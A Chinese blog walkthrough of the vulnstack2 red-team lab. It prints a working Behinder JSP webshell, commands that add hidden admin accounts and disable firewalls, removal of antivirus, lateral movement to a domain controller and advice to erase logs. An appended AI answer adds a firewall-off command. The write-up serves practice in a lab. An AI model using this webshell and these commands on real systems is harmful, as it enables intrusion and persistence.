【红日靶场】vulnstack2-完整渗透过程

本文详细描述了一个企业环境的渗透测试过程,涉及网络拓扑、配置信息、信息收集技术(如SMBrelay、WMI利用等)、权限提升及痕迹清除,展示了如何通过实际场景演练红队技术攻防。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


一、网络拓扑

示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。
网络配置:
在这里插入图片描述

二、描述

红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX

  1. Bypass UAC
  2. Windows系统NTLM获取(理论知识:Windows认证)
  3. Access Token利用(MSSQL利用)
  4. WMI利用
  5. 网页代理,二层代理,特殊协议代理(DNS,ICMP)
  6. 域内信息收集
  7. 域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
  8. 域凭证收集
  9. 后门技术(黄金票据/白银票据/Sid History/MOF)
  • 环境说明
    内网网段:10.10.10.1/24
    DMZ网段:192.168.111.1/24
    测试机地址:192.168.111.1(Windows),192.168.111.11(Linux)
    防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问):
deny all tcp ports:10.10.10.1
allow all tcp ports:10.10.10.0/24
  • 配置信息
    DC
    IP:10.10.10.10OS:Windows 2012(64)
    应用:AD域
    WEB:
    IP1:10.10.10.80 IP2:192.168.111.80OS:Windows 2008(64)
    应用:Weblogic 10.3.6 MSSQL 2008
    PC:
    IP1:10.10.10.111 IP2:192.168.111.201 OS:Windows 7(32)
    攻击机:
    IP:192.168.111.1 OS:Windows 11(64)
    IP:192.168.111.128 OS:kaliLinux(64)

配置环境

web主机登录使用de1ay用户登录密码是1qaz@WSX
在这里插入图片描述
这里的网关地址给的1也就是主机的地址所以这里是没外网的如果要外网修改为2就行,这里做内网我就不改了

在这里插入图片描述
开启weblogic:C:\Oracle\Middleware\user_projects\domains\base_domain
使用管理员才能进去administrator/1qaz@WSX
在这里插入图片描述
再次输入账户和密码启动:
在这里插入图片描述
在这里插入图片描述
内网网卡是防火墙禁用10网段外网无法访问10段:
在这里插入图片描述

渗透开始

信息收集

目标:192.168.111.80是作为web的边界的攻击目标
主要服务:web、sql server和rdp和weblogic还有smb
在这里插入图片描述
存在多个漏洞:
在这里插入图片描述

开始攻击

直接开打:
在这里插入图片描述
执行命令:tasklist /svc
在这里插入图片描述
存在杀软:360
在这里插入图片描述
尝试上传shell是否会杀:正常先做免杀测试
先获取一下路径:
在这里插入图片描述
在这里插入图片描述
好像被杀了:换了个工具继续上传
在这里插入图片描述
成功了上传冰蝎马:
在这里插入图片描述

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

/该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond/

在这里插入图片描述
成功拿到shell:
在这里插入图片描述
寻找一下位置:
在这里插入图片描述
注入内存马稳定shell:
在这里插入图片描述

信息收集:存在多张网卡
在这里插入图片描述
确定是否存在域环境:
在这里插入图片描述
上面检测出360得想个办法给他干掉

干掉杀软

一、 3389上去直接关闭,需要创建管理员用户
二、 提权到system关闭
三、 对c2做免杀
创建用户:

net user julien 1qaz@WSX /add
net localgroup Administrators julien /add

在这里插入图片描述
连接是报错:
在这里插入图片描述
使用administrator用户登录因为不知道密码直接改密码:

net user Administrator 1qaz@WSX

在这里插入图片描述
登录
在这里插入图片描述
直接卸载

在这里插入图片描述
在这里插入图片描述

关闭防火墙然后就可以为所欲为了!!

cs上线

上线cs马:
生成马上传运行
在这里插入图片描述

在这里插入图片描述
抓取明文密码:
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
mssql也是弱密码还有域内的用户名密码

权限提升

使用ms14-058提权
在这里插入图片描述
拿到system权限:
在这里插入图片描述

内网探测

cs探测不到
在这里插入图片描述
使用fscan试试:
看到10.10.10.10
在这里插入图片描述
上线msf:
在这里插入图片描述
上传运行:
在这里插入图片描述

做socks 4:
在这里插入图片描述
kali连接socks
在这里插入图片描述
在这里插入图片描述

探测到192.168.111.201:
在这里插入图片描述
cs的arp探测:
在这里插入图片描述
192.168.111.2和128是我的主机和kali省略:smb上线尝试横向

横向移动

使用smb beacon上线:
在这里插入图片描述
上线成功:
在这里插入图片描述
查看有无杀软:

在这里插入图片描述
还有360:
在这里插入图片描述
有开3389:抓取密码登录rdp
在这里插入图片描述
查看一下administrator的用户:
在这里插入图片描述
在这里插入图片描述
尝试administrator和mssql登录3389:(失败)

在这里插入图片描述
直接探测其他主机:
在这里插入图片描述
前面探测到10.10.10.10,这里直接横向尝试:
在这里插入图片描述
再次横向移动:
在这里插入图片描述

再次横向

拿到权限:
在这里插入图片描述

rdp连接

修改Administrator登录3389:
在这里插入图片描述

在这里插入图片描述
笑死

创建用户继续:
在这里插入图片描述
在这里插入图片描述
注意这样会有弹窗:
这里是我已经登录了
在这里插入图片描述
费劲终于拿到了,去干掉杀软
在这里插入图片描述
在这里插入图片描述
关闭防火墙:
在这里插入图片描述
再去拿10主机:
也开了3389
在这里插入图片描述
这里因为10主机在内网,主机不能直接连需要通过socks:
先看有无杀软:
在这里插入图片描述
没有:
在这里插入图片描述

这里用命令关闭防火墙:
在这里插入图片描述

因为我们主机不能直接访问10.10.10.10(其实是可以的但是假装不可以)做一下socks5:
在这里插入图片描述

shell工具连接使用代理:
在这里插入图片描述

然后抓一下账户和密码:
在这里插入图片描述
怎么都是空的没有密码:
直接创建用户并加入组:
net user julien 1qaz@WSX /add
net localgroup administrators julien /add

在这里插入图片描述
直接shell工具连接:
在这里插入图片描述
代理用上面的:
在这里插入图片描述
这里代理好像失败了:
在这里插入图片描述
那就直接用kali的rdp

proxychains rdesktop -g 1440x900 -r disk:LinuxDisk=/root/Downloads -u julien -p “1qaz@WSX” 10.10.10.10:3389

kali连接失败:

在这里插入图片描述
尝试去cs上面找找问题:
查看端口:
在这里插入图片描述
nmap探测一下:
在这里插入图片描述
感觉没问题再次尝试连接:
直接用已经拿到的主机进行连接:这里用上面的windows7连接的10域控成功拿到:
在这里插入图片描述
成功通过。

痕迹清除

删除多个日志特别是weblogic的日志别忘,用户等创建可以使用隐藏方式创建,创建影子账号后面会用到这里就不展示了,痕迹清除就是原路返回,有很多工具可以用大家自己找吧这里就不放了!

总结:

可以通过多种方式进行渗透测试这里只是我自己喜欢的方式,内网还能抓取hash等利用,在后面的红日靶场系列中会使用。

<think>好的,用户想了解如何搭建红日靶场的环境,需要教程和配置指南。我需要根据提供的引用信息来整理步骤。首先,引用[1]和[2]提到了红日靶场的官网和配置说明,应该从这里获取官方资料。引用[3]中的内容详细描述了靶场搭建的拓扑图、网络配置,以及外网打点的步骤,比如nmap扫描、目录扫描、利用phpmyadmin日志getshell等。引用[4]提供了一个超详细的操作指南,适合新手,可能包含具体的虚拟机设置和权限配置,比如关闭Win7防火墙、黄金票据的制作问题。此外,用户可能需要知道环境搭建后的内网攻击步骤,如ms17_010漏洞扫描和利用。 需要注意的是,引用[3]中的目录结构可能对应不同的阶段,比如外网渗透、内网信息搜集、横向移动等,但用户现在需要的是环境搭建部分。所以应该聚焦在拓扑图配置、网络设置、虚拟机安装等方面。引用[4]提到制作黄金票据后访问域控的问题,虽然属于后期渗透测试的内容,但环境搭建时需要正确配置域控权限和网络策略,避免出现访问问题。 另外,用户可能对虚拟机软件的选择(如VMware或VirtualBox)、镜像导入、网络适配器配置(如NAT、仅主机模式)有疑问,需要详细说明。引用[3]中的“配置网络”可能涉及设置多个虚拟机的IP地址,确保它们在同一子网内,并正确隔离内外网环境。可能还需要关闭防火墙(如Win7防火墙)以便测试,如引用[4]所述。 需要提醒用户注意版权问题,确保从官网下载资源,避免使用非官方镜像。同时,步骤中可能涉及复杂的内网渗透配置,建议分阶段验证,例如先确保各虚拟机互通,再测试外网到内网的连通性。可能遇到的常见问题包括网络不通、服务未启动、权限配置错误等,需提供排查方法,比如检查IP设置、服务状态、防火墙规则等。 最后,根据引用[5],可能有培训课程提供更深入的指导,但用户目前只需基础搭建步骤。因此,回答应结构清晰,分步骤说明,并附上相关引用来源,确保信息可靠。需要检查是否有遗漏的关键点,如虚拟机快照管理、必要的软件安装(如phpMyAdmin、XSS平台等),以及后续测试的基本流程概述,帮助用户搭建后验证环境是否成功。</think>### 红日靶场环境搭建指南 #### 1. **环境准备** - **官网资源下载** 访问红日靶场官网[^2]获取镜像文件(如Windows Server、Win7等虚拟机镜像)及拓扑图。建议使用VMware Workstation或VirtualBox作为虚拟化平台。 - **网络拓扑理解** 根据引用[3]中的靶场拓扑图,配置内外网隔离环境。典型结构包含外网WEB服务器、内网域控服务器(DC)和多个内网主机,需设置NAT和仅主机模式网卡实现网络分层。 #### 2. **虚拟机配置** - **镜像导入与网络适配** 将下载的OVA/OVF镜像导入虚拟机软件,为每台虚拟机分配网络适配器: - **WEB服务器**:外网网卡(NAT模式) + 内网网卡(仅主机模式) - **内网主机(如Win7)**:仅主机模式网卡 - **域控服务器(DC)**:仅主机模式网卡 - **IP地址设置** 根据拓扑图手动配置静态IP,确保内外网互通。例如: - WEB服务器外网IP:`192.168.1.100`,内网IP:`10.10.10.2` - 域控服务器IP:`10.10.10.1` - Win7主机IP:`10.10.10.3` #### 3. **服务与权限配置** - **关闭防火墙** 在Win7和域控服务器中关闭系统防火墙(引用[4]),避免拦截测试流量: ```cmd netsh advfirewall set allprofiles state off ``` - **域环境搭建** 在域控服务器安装Active Directory服务,创建测试域(如`test.local`),将Win7主机加入域。确保域账户权限正常,用于后续黄金票据测试[^4]。 #### 4. **漏洞环境验证** - **外网渗透测试** 使用Kali Linux对WEB服务器进行扫描(引用[3]): ```bash nmap -sV 192.168.1.100 dirsearch -u http://192.168.1.100 -e php,asp ``` - **内网连通性检查** 从WEB服务器通过内网IP访问域控共享目录,验证网络隔离是否生效: ```cmd dir \\10.10.10.1\C$ ``` #### 5. **常见问题解决** - **网络不通** 检查虚拟机网卡模式、IP地址是否冲突,确保网关和DNS设置正确。 - **权限访问失败** 若黄金票据制作后仍无法访问域控(引用[4]),需检查Kerberos票据有效期、系统时间同步及SPN配置。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0x717866

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值